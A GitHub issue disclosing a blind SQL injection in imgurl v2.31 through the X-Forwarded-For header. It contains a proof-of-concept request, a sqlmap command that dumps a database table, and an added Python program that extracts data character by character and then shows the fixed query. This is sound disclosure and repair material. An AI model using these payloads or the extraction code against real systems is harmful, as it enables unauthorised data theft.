Blind SQL Injection Vulnerability #75

Open
Bronya-Rayi opened this issue Apr 11, 2022 · 1 comment

@Bronya-Rayi
Description

imgurl v2.31

Multiple methods are used to obtain the user's IP.

The user IP is then spliced directly into the SQL statement in lines 44 to 58 of upload.php.

query->uplimit($ip)

Proof of Concept

GET /upload/localhost HTTP/1.1
Host: host.local
Cookie: XSRF-TOKEN=[Your_XSRF-TOKEN]; 
x-forwarded-for: ' union select case(2>1)when(1)then(10)else(0)end order by num desc-- 
Connection: close

Command for injection using sqlmap

python3 sqlmap.py -r http.txt --prefix="' union select case((1=1) and " --suffix=")when(1)then(10)else(0)end order by num desc-- " --level 3 --risk 3 --dbms sqlite --technique=B --text-only -T img_options -D values --dump

Repair method

Check the user IP format or use PDO to prevent SQL injection.
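As an added illustration (not code from the report or from imgurl, whose upload.php is PHP), the following Python/sqlite3 program models the mechanism and the fix described above: the client IP taken from X-Forwarded-For is concatenated into the query, the CASE payload from the PoC turns the "upload refused / upload allowed" decision into a true/false oracle that leaks data one character at a time, and the hardened function validates the IP and binds it as a query parameter. The table imginfo, its num column, UPLOAD_LIMIT, and the sample rows are assumptions modelled on the report, not the project's real schema or query.

```python
"""Blind (boolean-based) SQL injection via a client-IP header, and the fix.

Added example, not imgurl's code. Schema and limit below are assumptions.
"""
import ipaddress
import sqlite3

UPLOAD_LIMIT = 5  # assumed per-IP upload limit enforced by uplimit()

# Injection payload from the PoC; {cond} is any SQLite boolean expression.
# CASE returns 10 when cond is true and 0 otherwise; ORDER BY num DESC puts
# that row first, so fetchone() sees it.
PAYLOAD = "' union select case({cond})when(1)then(10)else(0)end order by num desc-- "


def build_db():
    """In-memory SQLite database with constructed sample data (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE imginfo (ip TEXT, num INTEGER)")
    conn.execute("INSERT INTO imginfo VALUES ('203.0.113.9', 2)")
    # Stand-in for the img_options table the report dumps with sqlmap.
    conn.execute("CREATE TABLE img_options (key TEXT, value TEXT)")
    conn.execute("INSERT INTO img_options VALUES ('admin_mail', 'root@host.local')")
    return conn


def client_ip(headers, remote_addr):
    """Mirrors the report: an attacker-controlled X-Forwarded-For wins over the socket address."""
    return headers.get("x-forwarded-for", remote_addr)


def uplimit_vulnerable(conn, ip):
    """Upload counter with the IP concatenated into the SQL, as described for upload.php."""
    sql = "SELECT num FROM imginfo WHERE ip = '" + ip + "'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else 0


def over_limit_vulnerable(conn, headers, remote_addr="198.51.100.7"):
    """The only bit the attacker observes: was the upload refused (True) or not."""
    return uplimit_vulnerable(conn, client_ip(headers, remote_addr)) >= UPLOAD_LIMIT


def blind_extract(conn, query, length):
    """Recover the result of `query` one character at a time through the refuse/allow oracle."""
    charset = "abcdefghijklmnopqrstuvwxyz0123456789@._-"
    out = ""
    for pos in range(1, length + 1):
        for ch in charset:
            cond = f"(select substr(({query}),{pos},1))='{ch}'"
            headers = {"x-forwarded-for": PAYLOAD.format(cond=cond)}
            if over_limit_vulnerable(conn, headers):  # CASE yielded 10: guess was right
                out += ch
                break
    return out


def is_valid_ip(ip):
    """Format check from the repair method: accept only a literal IPv4/IPv6 address."""
    try:
        ipaddress.ip_address(ip)
    except ValueError:
        return False
    return True


def uplimit_fixed(conn, ip):
    """Repaired counter: reject non-IP input, then bind the value as a parameter."""
    if not is_valid_ip(ip):
        raise ValueError("invalid client IP")
    # With binding the value can never change the statement's structure,
    # so even an unvalidated payload would only fail to match any row.
    row = conn.execute("SELECT num FROM imginfo WHERE ip = ?", (ip,)).fetchone()
    return row[0] if row else 0


if __name__ == "__main__":
    db = build_db()
    print("leaked:", blind_extract(db, "select value from img_options", 15))
    print("fixed:", uplimit_fixed(db, "203.0.113.9"))
```

The two halves of the fix are independent: parameter binding alone closes the injection, and the format check adds defence in depth and also rejects the comma-separated proxy lists X-Forwarded-For can legitimately carry. Separately from the SQL issue, a header like X-Forwarded-For should only be honoured when the request comes from a trusted reverse proxy, since any client can set it.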

@xulei1112

Awesome